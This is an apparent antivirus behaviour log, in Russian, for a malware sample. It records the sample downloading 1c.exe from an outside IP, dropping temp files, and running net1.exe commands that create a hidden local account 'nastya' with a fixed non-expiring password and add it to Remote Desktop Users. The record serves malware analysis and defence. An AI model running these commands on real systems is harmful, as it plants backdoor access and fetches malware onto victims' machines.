Техническая информация
- '%TEMP%\1c.exe'
- '%TEMP%\1c.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s nastya /add
- '<SYSTEM32>\ping.exe' -n 2 localhost
- '<SYSTEM32>\net1.exe' user nastya E@vk!f7W4l$i0 /add /EXPIRES:NEVER /PASSWORDCHG:NO
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" nastya /add
- %TEMP%\1c.exe
- %TEMP%\ywozuax
- %TEMP%\aut1.tmp
- %TEMP%\1c.exe
- %TEMP%\ywozuax
- %TEMP%\aut1.tmp
- '78.##8.199.180':80
- 78.##8.199.180/1c.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''